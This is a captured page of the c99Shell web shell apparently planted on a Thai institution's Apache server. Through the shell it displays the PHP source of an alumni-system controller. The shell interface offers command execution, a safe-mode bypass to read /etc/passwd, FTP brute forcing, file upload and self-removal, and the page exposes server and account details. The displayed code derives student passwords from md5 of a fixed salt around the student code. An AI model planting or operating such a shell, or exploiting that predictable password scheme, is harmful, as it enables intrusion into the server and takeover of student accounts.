!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ea_controller.php (13.27 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
ini_set
("display_errors"1);
include(
'application/controllers/my_controller.php');
class 
Ea_controller extends My_controller {
    public 
$contents;
    
    public function 
__construct() {
        
parent::__construct();
        
$this->db $this->load->database('ea'TRUE);
    }
    
    function 
output($v$blog='') {
        
$this->contents['table_color_even'] = $this->config->item('table_c_even');
        
$this->contents['tr_color_even'] = $this->config->item('tr_c_even');
        
$this->contents['font_color_table'] = $this->config->item('font_c_table');
        
$this->contents['font_color_err'] = $this->config->item('font_c_err');

        if(
$blog!='') {
            
$msg['blog'] = $blog;
            
$this->blog $this->load->view('info/v_blog',$msg,true);
        }

        
$this->body $this->load->view($this->config->item("rg_folder").'v_header_js',$this->contents,true);
        
$this->body $this->load->view($v,$this->contents,true);
        
$this->show();
    }

    function 
output_detail($v) {
        
$this->contents['table_color_even'] = $this->config->item('table_c_even');
        
$this->contents['tr_color_even'] = $this->config->item('tr_c_even');
        
$this->contents['font_color_table'] = $this->config->item('font_c_table');
        
$this->contents['font_color_err'] = $this->config->item('font_c_err');

        
$lv['head'] = $this->load->view($this->config->item("rg_folder").'v_header_js',$this->contents,true);
        
$lv['body'] = $this->load->view($v,$this->contents,true);
        
$lv['footer'] = "";
        
        
$this->load->view('info/v_in',$lv);
    }

    function 
output_pdf($v) {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
        
        
$qu_cfg $this->cfg->qryCfg();
        if(
$row $qu_cfg->row()) {
            
$this->contents['cfgSiteName'] = $row->cfgSiteName;
            
$this->contents['cfgClgLogo'] = $row->cfgClgLogo;
            
$this->contents['cfgClgName'] = $row->cfgClgName;
            
$this->contents['cfgClgNameE'] = $row->cfgClgNameE;
            
$this->contents['cfgClgAddr'] = $row->cfgClgAddr;
            
$this->contents['cfgInstituteLogo'] = $row->cfgInstituteLogo;
            
$this->contents['cfgInstitute'] = $row->cfgInstitute;
            
$this->contents['cfgInstituteE'] = $row->cfgInstituteE;
            
$this->contents['cfgMinistry'] = $row->cfgMinistry;
            
$this->contents['cfgMinistryE'] = $row->cfgMinistryE;
            
$this->contents['font_color_err'] = $row->cfgFnClErrSpec;
        }
        
        
//$qu_ac = $this->ac->qryAc();
        
$qu_ac $this->ac->qryAcPrsIdRegistrarJoinPrs();
        if(
$row $qu_ac->row()) {
            
$this->contents['acExitExam'] = $row->acExitExam;
            
$this->contents['acCardExpiryDay'] = $row->acCardExpiryDay;
            
$this->contents['acCardExpiryMonth'] = $row->acCardExpiryMonth;
            
$this->contents['TSREGISTAR'] = $row->TSRegistrar;
            
$this->contents['TSREGISTARE'] = $row->TSRegistrarE;
            
$this->contents['DIRECTOR'] = $row->Director;
            
$this->contents['DIRECTORE'] = $row->DirectorE;
            
$this->contents['acPrsIdDirector'] = $row->acPrsIdDirector;
        }

        
$lv['head'] = "";
        
$lv['body'] = $this->load->view($v,$this->contents,true);
        
$lv['footer'] = "";
        
        
$this->load->view('info/v_in',$lv);
    }

    function 
getExcelHeader () {
        
$msg "header('Content-type: application/ms-xls');";
        
$msg .= "header('Content-Disposition: attachment; filename=\"report.xls\"');";
        
        return 
$msg;
    }

    function 
getWordHeader () {
        
$msg "header('Content-type: application/msword');";
        
$msg .= "header('Content-Disposition: attachment; filename=\"report.doc\"');";
        
        return 
$msg;
    }

    function 
load_model($model_name){
        
$model $this->config->item("rg_folder").$model_name;
        echo 
$model.'<br>';
        
$this->load->model($model,'m');
        
$model =& $this->m;
        unset(
$this->m);
        return 
$model;
    }
    
    function 
checkselect($str){
        if (
$str == "" || $str == "0") {
            
$this->form_validation->set_message('checkselect','กรุณาเลือก%s');
            return 
false;
        }else return 
true;
    }
    
    function 
checkupload($str){
        
$this->form_validation->set_message('checkupload','%s');
        return 
false;
    }

    function 
checkAdY($str) {
        if(
$str=='') {
            
$this->form_validation->set_message('checkAdY','กรุณาป้อน%s');
            return 
false;
        } else if(
is_numeric($str)==false) {
            
$this->form_validation->set_message('checkAdY','%sต้องเป็นตัวเลขเท่านั้น');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAdY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        } else if(
$str==0) {
            
$this->form_validation->set_message('checkAdY','%sจะต้องมากกว่า 0');
            return 
false;
        } else {
            return 
true;
        }
    }

    function 
checkAdY_2($str) {
        if(
$str!="") {
            if(
is_numeric($str)==false) {
                
$this->form_validation->set_message('checkAdY','%sต้องเป็นตัวเลขเท่านั้น');
                return 
false;
            } else if(
strlen($str)!=4) {
                
$this->form_validation->set_message('checkAdY','%sจะต้องเท่ากับ 4 หลัก');
                return 
false;
            } else if(
$str==0) {
                
$this->form_validation->set_message('checkAdY','%sจะต้องมากกว่า 0');
                return 
false;
            } else {
                return 
true;
            }
        }
    }

    function 
checkAcY($str) {
        if(
$str=='') {
            
$this->form_validation->set_message('checkAcY','กรุณาป้อน%s');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        } else if(
$str==0) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องมากกว่า 0');
            return 
false;
        }

        if(
$str >= $this->input->post('admitAcY')) {
            return 
true;
        } else {
            
$this->form_validation->set_message('checkAcY','%sจะต้องมากกว่าหรือเท่ากับปีที่เข้า');
            return 
false;
        }
    }

    function 
checkFrDate($str$field) {
        
$end_date splitDateForm2($str,'-');

        
$alpha "-";
        
$tmp strpos($this->input->post($field), $alpha); // update case
        
if($tmp==TRUE) {
            
$start_date $this->input->post($field);
        } else {
            
$start_date splitDateForm2($this->input->post($field),'-');
        }

        if(
$start_date $end_date) {
            
$this->form_validation->set_message('checkFrDate''%s ต้องน้อยกว่าหรือเท่ากับ วันที่เริ่มต้น');
            return 
FALSE;
        } else {
            return 
TRUE;
        }
    }

    
// ################################## import data ##################################

    // check First node
    
function checkFirstNode($arr) {
        
$name 0;
        foreach(
$arr as $key => $val) {
            foreach(
$val as $k => $v) {
                if(
$k=='name') {
                    
$name $v;
                }
            }
        }
        return 
intval($name);
    }

    
// check End node
    
function checkEndNode($arr) {
        
$end 0;
        foreach(
$arr as $key => $val) {
            foreach(
$val as $k => $v) {
                if(
$k=='end') {
                    
$end $v;
                }
            }
        }
        return 
intval($end);
    }


    function 
copy_CurriculumConfig() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_CurriculumConfig";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_cc simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_curriculumconfig','cc');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_cc);
        
$endNode $this->checkEndNode($rs_cc);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_cc as $key => $val) {
                if(
$val->ccId!='') {
                    
$this->cc->ccId $val->ccId;
                    
$qu_cc $this->cc->get_by_key();
                    if(
$qu_cc->num_rows()==0) {
                        
$this->cc->ccId intval($val->ccId);
                        
$this->cc->ccCode strval($val->ccCode);
                        
$this->cc->ccName strval($val->ccName);
                        
$this->cc->ccStatus strval($val->ccStatus);
                        
$this->cc->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }
        } else {
            
// fail copy
            
return "F";
        }
    }

    function 
copy_Edg() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_EduDegree";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_edg simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_edudegree','edg');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_edg);
        
$endNode $this->checkEndNode($rs_edg);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_edg as $key => $val) {
                if(
$val->edgId!='') {
                    
$this->edg->edgId $val->edgId;
                    
$qu_edg $this->edg->get_by_key();

                    if(
$qu_edg->num_rows()==0) {
                        
$this->edg->edgId intval($val->ccId);
                        
$this->edg->edgName strval($val->edgName);
                        
$this->edg->edgNameE strval($val->edgNameE);
                        
$this->edg->edgAbbr strval($val->edgAbbr);
                        
$this->edg->edgAbbrE strval($val->edgAbbrE);
                        
$this->edg->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }

            return 
true;
        } else {
            
// fail copy
            
return "F";
        }
    }

    function 
copy_Cur() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_curriculum";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_cur simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_curriculumdetails','curd');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_cur);
        
$endNode $this->checkEndNode($rs_cur);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_cur as $key => $val) {
                if(
$val->curId!='') {
                    
$this->curd->curId $val->curId;
                    
$qu_cur $this->curd->get_by_key();

                    if(
$qu_cur->num_rows()==0) {
                        
$this->curd->curId intval($val->curId);
                        
$this->curd->curImproveY intval($val->curImproveY);
                        
$this->curd->curName strval($val->curName);
                        
$this->curd->curNameE strval($val->curNameE);
                        
$this->curd->curAbbr strval($val->curAbbr);
                        
$this->curd->curAbbrE strval($val->curAbbrE);
                        
$this->curd->curStatus strval($val->curStatus);
                        
$this->curd->curCcId intval($val->curCcId);
                        
$this->curd->ccCode strval($val->ccCode);
                        
$this->curd->ccName strval($val->ccName);
                        
$this->curd->curEdgId intval($val->curEdgId);
                        
$this->curd->edgName strval($val->edgName);
                        
$this->curd->edgNameE strval($val->edgNameE);
                        
$this->curd->edgAbbr strval($val->edgAbbr);
                        
$this->curd->edgAbbrE strval($val->edgAbbrE);
                        
$this->curd->curElvId intval($val->curElvId);
                        
$this->curd->levelName strval($val->levelName);
                        
$this->curd->levelNameEng strval($val->levelNameEng);
                        
$this->curd->levelAbbr strval($val->levelAbbr);
                        
$this->curd->levelAbbrEng strval($val->levelAbbrEng);
                        
$this->curd->curAddType 'R';
                        
$this->curd->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }
        } else {
            
// fail copy
            
return "F";
        }
    }

    
//----[]--- ฟังก์ชั่น สร้าง umuser
    
function importToUms($stdCode$stdName$stdSurname) {
        
$this->load->model($this->config->item("ea_ums_folder").'m_umuser','um');
        
$this->load->model($this->config->item("ea_ums_folder").'m_umusergroup','ug');

        
$qu_um $this->um->qryUmUserByUsPsCode($stdCode);
        if(
$qu_um->num_rows()==0) {
            
$this->um->UsID "";
            
$this->um->UsName $stdName." ".$stdSurname;
            
$this->um->UsLogin $stdCode;
            
$this->um->UsPassword md5("O]O".$stdCode."O[O");
            
$this->um->UsPsCode $stdCode;
            
$this->um->UsWgID "6";
            
$this->um->UsQsID NULL;
            
$this->um->UsAnswer NULL;
            
$this->um->UsEmail NULL;
            
$this->um->UsActive "1";
            
$this->um->UsAdmin "0";
            
$this->um->UsDesc NULL;
            
$this->um->UsPwdExpDt NULL;
            
$this->um->UsUpdDt NULL;
            
$this->um->UsUpdUsID NULL;
            
$this->um->UsSessionID "";
            
$this->um->insert();

            
$this->ug->UgID $this->ug->getMaxUgID();
            
$this->ug->UgGpID "191001";
            
$this->ug->UgUsID $this->um->last_insert_id();
            
$this->ug->insert();
        }

        return 
true;
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--